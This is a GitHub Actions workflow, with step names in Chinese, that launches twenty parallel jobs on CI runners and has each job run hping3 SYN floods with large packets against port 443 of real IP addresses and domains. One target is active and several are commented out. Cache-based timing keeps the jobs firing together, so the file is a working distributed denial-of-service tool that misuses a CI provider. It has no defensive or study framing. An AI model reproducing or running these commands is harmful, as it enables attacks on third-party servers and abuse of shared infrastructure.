on:
  push:
  workflow_dispatch:

concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

env:
  TZ: Asia/Shanghai
  TASK_COUNT: 1000

jobs:
  prepare-matrix:
    runs-on: ubuntu-latest
    outputs:
      ids: ${{ steps.set-matrix.outputs.ids }}
    steps:
      - id: set-matrix
        run: |
          count=20
          ids=$(jq -c -n --argjson n "$count" '[range(1; $n+1)]')
          echo "ids=$ids" >> $GITHUB_OUTPUT

  concurrent-jobs:
    needs: prepare-matrix
    runs-on: ubuntu-latest
    continue-on-error: true
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        job_id: ${{ fromJson(needs.prepare-matrix.outputs.ids) }}

    steps:
      - name: 记录开始时间
        id: start
        run: echo "start_time=$(date +%s)" >> $GITHUB_OUTPUT

      - name: 检查首个job完成时间
        id: check_time
        uses: actions/cache/restore@v4
        with:
          path: matrix_first_finished_time.txt
          key: matrix-first-finished-${{ github.run_id }}

      - name: 判断是否需要退出
        if: steps.check_time.outputs.cache-hit == 'true'
        run: |
          first_done=$(cat matrix_first_finished_time.txt)
          my_start=${{ steps.start.outputs.start_time }}
          echo "First: $first_done, Mine: $my_start"
          if [ "$my_start" -gt "$first_done" ]; then
            echo "::error::当前job启动时间晚于首个job完成时间"
            exit 1
          fi

      - uses: actions/checkout@v4
        with:
          repository: mirllan2025/express

      - name: Step 1
        run: |
          sudo apt install hping3 -q
          yarn
          timeout 600s node index.js --count ${{env.TASK_COUNT}}

      - name: Step 2
        run: |
          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 137.220.188.11 || true
          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 137.220.188.12 || true

          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 182.16.89.10 || true
          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 182.16.89.11 || true
          # sudo timeout 10s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 180.178.38.85 || true
          
          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 154.198.240.70 || true

          # Alibaba
          # IP="80ym.com" # 8.210.147.180
          IP="47.239.16.131"
          # IP="154.89.50.218" # www.enk7h.vip
          # IP="ngk86.vip"
          TIMEOUT=2

          # Cloudflare
          # IP="www.gname.com"
          # TIMEOUT=0

          # 如果不是IPv4地址，则认为是域名，去解析
          if [[ ! $IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
              IP=$(dig +short "$IP" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n 1)
          fi

          sudo timeout $TIMEOUT hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 $IP || true

      - name: 再次检查首个job完成时间
        if: always()
        id: double_check
        uses: actions/cache/restore@v4
        with:
          path: matrix_first_finished_time.txt
          key: matrix-first-finished-${{ github.run_id }}

      - name: 保存首个job完成时间
        if: always() && steps.double_check.outputs.cache-hit != 'true'
        run: date +%s > matrix_first_finished_time.txt

      - name: 缓存首个job完成时间
        if: always() && steps.double_check.outputs.cache-hit != 'true'
        uses: actions/cache/save@v4
        with:
          path: matrix_first_finished_time.txt
          key: matrix-first-finished-${{ github.run_id }}